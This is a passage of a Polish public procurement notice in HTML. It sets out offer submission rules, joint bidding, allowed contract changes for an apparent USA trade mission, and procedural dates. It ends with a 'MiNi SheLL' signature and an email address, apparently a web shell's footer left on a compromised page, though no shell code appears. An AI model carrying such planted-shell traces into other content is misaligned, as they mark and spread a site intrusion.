podpisów. Złożenie oferty na nośniku<br/>danych lub w innej formie niż przewidziana powyżej jest niedopuszczalne, nie stanowi bowiem<br/>jej złożenia przy użyciu środków komunikacji elektronicznej.<br/>3. Do oferty należy dołączyć:<br/>1) pełnomocnictwo upoważniające do złożenia oferty, oświadczeń i pozostałych wymaganych<br/>przez Zamawiającego dokumentów oraz do składania ewentualnych wyjaśnień, o ile ofertę<br/>składa pełnomocnik;<br/>2) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału<br/>w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy PZP (Załącznik nr 3 do SWZ).<br/>4. Ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym zgodnie z Instrukcją Użytkownika.<br/>5. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz<br/>z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>6. Przed podpisaniem umowy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w<br/>przypadku wyboru ich oferty jako najkorzystniejszej) przedstawią Zamawiającemu umowę<br/>regulującą współpracę tych Wykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku muszą<br/>ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać w szczególności:<br/>1) wskazanie postępowania o zamówienie publiczne, którego dotyczy,<br/>2) Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>3) ustanowionego pełnomocnika oraz<br/>4) zakres jego umocowania, a także<br/>5) oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte<br/>wykonanie zamówienia.<br/>3. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców. Zamawiający wymaga, by<br/>Wykonawca wskazał w umowie regulującej warunki współpracy Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia informacje, który z nich jest uprawniony do<br/>wystawienia wszelkich dokumentów księgowych w ramach umowy w sprawie zamówienia<br/>i inkasowania wszelkich płatności z nich wynikających. Tym samym Zamawiający wymaga, by<br/>wszelkie rozliczenia realizowane w ramach umowy odbywały się z jednym podmiotem.<br/>Zamawiający wymaga, by umowa regulująca współpracę Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia zawierała również informacje o wspólnej solidarnej<br/>odpowiedzialności tych Wykonawców za wykonanie lub nienależyte wykonanie zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność<br/>za wykonanie umowy.<br/>5. Postanowienia SWZ dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość wprowadzenia zmian do Umowy w zakresie:<br/>1) terminu wykonania Przedmiotu Umowy, lub terminu wykonania poszczególnych jego<br/>elementów,<br/>2) godzin przelotu w jedną lub obie strony,<br/>3) liczby biletów lotniczych, noclegów, przejazdów, posiłków lub osób biorących w nich udział,<br/>4) sposobu i zakresu transportu na miejscu w USA,<br/>5) wysokości wynagrodzenia lub jego sposobu i terminu płatności,<br/>na zasadach określonych w ustawie PZP i poniżej.<br/>2. Zamawiający dopuszcza zmiany Umowy w zakresie, o którym mowa w ust. 1 powyżej,<br/>spowodowane następującymi okolicznościami:<br/>1) zmiana przewidywanej liczby uczestników misji skutkująca koniecznością rezygnacji przez<br/>Zamawiającego z realizacji określonych usług lub elementów programu misji,<br/>2) zmiana liczby gości zaproszonych do udziału w spotkaniach i posiłkach zaplanowanych w<br/>ramach misji,<br/>3) zmiana ramowego harmonogramu misji,<br/>4) wystąpienie siły wyższej, za którą Strony uznają zdarzenie zewnętrzne, niemożliwe do<br/>przewidzenia, którego skutkom nie można było zapobiec, w tym okoliczności związane z<br/>niemożliwym do przewidzenia w chwili zawarcia Umowy wprowadzeniem obostrzeń w związku z<br/>epidemią SARS-CoV-2 na terenie Polski lub Stanów Zjednoczonych, w szczególności w<br/>zakresie przemieszczania się osób lub organizacji spotkań,<br/>5) zmiana powszechnie obowiązujących przepisów prawa, w tym zmiana obowiązującej stawki<br/>podatku VAT,<br/>6) zaistnienie innych okoliczności niezależnych od żadnej ze Stron mających wpływ na<br/>prawidłową realizację Przedmiotu Umowy zgodnie z celami Projektu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-10 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://investgda.ezamowienia.com/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-10 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie dopuszcza złożenia ofert wariantowych.<br/>2. Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>3. Zamawiający nie przewiduje udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8<br/>PZP.<br/>4. Zamawiający nie przewiduje możliwości oraz nie wymaga przeprowadzenia przez<br/>Wykonawcę wizji lokalnej ani sprawdzenia przez niego dokumentów niezbędnych do realizacji<br/>zamówienia, o których mowa w art. 131 ust. 2 ustawy PZP.<br/>5. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji<br/>elektronicznej wraz z informacjami, o których mowa w art. 230 ustawy PZP.<br/>6. Zamawiający nie stawia wymagań w zakresie zatrudnienia na podstawie stosunku pracy.<br/>7. Zamawiający nie stawia wymagań w zakresie zatrudnienia osób, o których mowa w art. 96<br/>ust. 2 pkt 2 ustawy PZP.<br/>8. Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie<br/>przez Wykonawców, o których mowa w art. 94 ustawy PZP.<br/>9. Zamawiający nie przewiduje rozliczeń z Wykonawcą w walutach obcych.<br/>10. Zamawiający nie przewiduje zwrotu kosztów udziału wykonawców w postepowaniu.<br/>11. Zamawiający nie dopuszcza złożenia ofert w postaci katalogów elektronicznych ani<br/>dołączenia katalogów elektronicznych do oferty.<br/>12. Zamawiający nie zastrzega obowiązku osobistego wykonania zamówienia kluczowych<br/>zadań.

Creat By MiNi SheLL
Email: jattceo@gmail.com